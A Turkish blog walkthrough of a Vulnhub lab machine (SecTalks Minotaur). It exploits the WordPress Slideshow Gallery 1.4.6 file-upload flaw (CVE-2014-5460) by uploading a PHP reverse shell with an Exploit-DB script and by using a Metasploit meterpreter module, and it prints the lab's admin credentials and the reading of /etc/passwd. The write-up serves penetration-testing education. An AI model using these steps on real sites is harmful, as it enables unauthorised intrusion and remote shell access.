Plecoat Aracı ile Tespit Edilen WordPress Slideshow Gallery 1.4.6 Zafiyetinin İstismarı

Web uygulamaları sızma testleri sırasında hedef uygulama üzerindeki bir eklentinin güncel olmaması zafiyete sebep olabilir. Bu yazıda, WordPress kurulu SecTalks: BNE0x00 – Minotaur sanal makinesi üzerindeki Slideshow Gallery eklentisinde bulunan CVE-2014-5460 ID’li kimlik doğrulamalı Dosya Yükleme (Authenticated Arbitrary File Upload) zafiyeti istismar edilerek uygulama kullanıcısı (www-data) yetkileri ile komut satırı erişimi elde edilecektir.

Yazıda kullanılan SecTalks: BNE0x00 – Minotaur sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/sectalks-bne0x00-minotaur,139/

Not: Sanal makinenin varsayılan adaptörü DHCP’den IP almamaktadır. Bu adaptöre statik olarak 192.168.56.223 IP’si atanmıştır.

Bu sunucunun /bull dizininde WordPress kuruludur.

http://192.168.56.223/bull

 

A) Plecoat ile WordPress Slideshow Gallery 1.4.6 Keşfi

Bu uygulamadaki zafiyetleri keşfetmek için Kali üzerindeki wpscan aracı kullanılabileceği gibi Plecoat aracı indirilerek de kullanılabilir. Kurulum için Python2 değil Python3 kullanılması ve bu sürüme uygun pip modülünün yüklenmesi gerekmektedir.

python3 -m pip install plecoat
apt-get install python3-pip

 

Gereksinimler tamamlandıktan sonra aracın kurulumu gerçekleştirilebilir.

python3 -m pip install plecoat

 

Gerekli ise eklentiler ve CVE listesi (nb: banner gösterilmeden) güncellenir.

plecoat -nb –update-all

 

Zafiyetlerin tespiti için bir çok eklenti listesi bulunmaktadır.

plecost -nb -l
wc -l /usr/local/lib/python3.5/dist-packages/plecost_lib/resources/*

 

Eklentiler incelendiğinde kullanılan Slideshow Gallery eklentisinin sürümünün 1.4.6 kullanılmış olduğu belirtilmektedir.

plecost -nb -w plugin_list_1000.txt http://192.168.56.223/bull

 

Not: WordPress yönetim konsoluna erişim sağlandığında da yüklü eklentiler listelenebilmektedir.

Username: bully
Password: Bighornedbulls
http://192.168.56.223/bull/wp-admin/plugins.php

 

2) 34681 Betiği ile Komut Satırı Erişimi Elde Edilmesi

searchsploit” ile “WordPress Plugin Slideshow Gallery 1.4.6 – Arbitrary File Upload (Python)” adlı CVE-2014-5460 ID’li bir zafiyet olduğu görülür. Bu zafiyete ait bir istismar kodunun yazıldığı da tespit edilmektedir.

searchsploit WordPress Slideshow Gallery -t 1.4.6
cp /usr/share/exploitdb/platforms/php/webapps/34681.txt SlideshowGallery1.4.6-Istismar.py
chmod +x SlideshowGallery1.4.6-Istismar.py
python SlideshowGallery1.4.6-Istismar.py | tail -32 | grep -Ev “^$”

 

Bu kod bir kullanıcı hesabı ve yüklenecek dosya bilgilerini istemektedir. Yüklenecek dosya olarak ters bağlantı sağlayan php-reverse-shell.php dosyası kullanılabilir.

cp /usr/share/webshells/php/php-reverse-shell.php .
vi php-reverse-shell.php
cat php-reverse-shell.php | grep CHANGE
python SlideshowGallery1.4.6-Istismar.py -t http://192.168.56.223/bull -u bully -p Bighornedbulls -f php-reverse-shell.php

 

Böylece dosya yüklenmiştir.

http://192.168.56.223/bull/wp-content/uploads/slideshow-gallery/?C=N;O=D

 

Ters bağlantıyı yakalayacak dinleyici başlatılır.

nc -nlvp 5555

 

Yüklenen sayfa çağırıldığında erişim elde edilir.

curl http://192.168.56.223/bull/wp-content/uploads/slideshow-gallery/php-reverse-shell.php
id
uname -a

 

C) MSF wp_slideshowgallery_upload İstismar Modülü ile Meterpreter Erişimi Elde Edilmesi

WordPress Slideshow Gallery 1.4.6 eklentisindeki zafiyetin istismarı için MSF wp_slideshowgallery_upload istismar modülü de kullanılabilir. Modül temel olarak Wordpess uygulamasına ait erişim bilgilerini ve kimlik bilgilerini almaktadır. Modül başlatıldığında istismar işlemi için varsayıaln olarak “php/meterpreter/reverse_tcp” payload’u kullanılır.

use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOST 192.168.56.223
set RPORT 80
set TARGETURI /bull/
set WP_USER bully
set WP_PASSWORD Bighornedbulls
exploit
shell
id
uname -a
head -3 /etc/passwd

 

Kaynak:

http://www.kitploit.com/2017/08/plecost-v111-wordpress-finger-printer.html
https://blog.secureideas.com/2013/01/laudanum-by-example-shell.html
http://www.hackingarticles.in/hack-minotaur-vm-ctf-challenge/
https://doelger.org/post/minotaur/

 

 

Yazarın Bilgileri

Abdulkerim Demir
Abdulkerim Demir

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.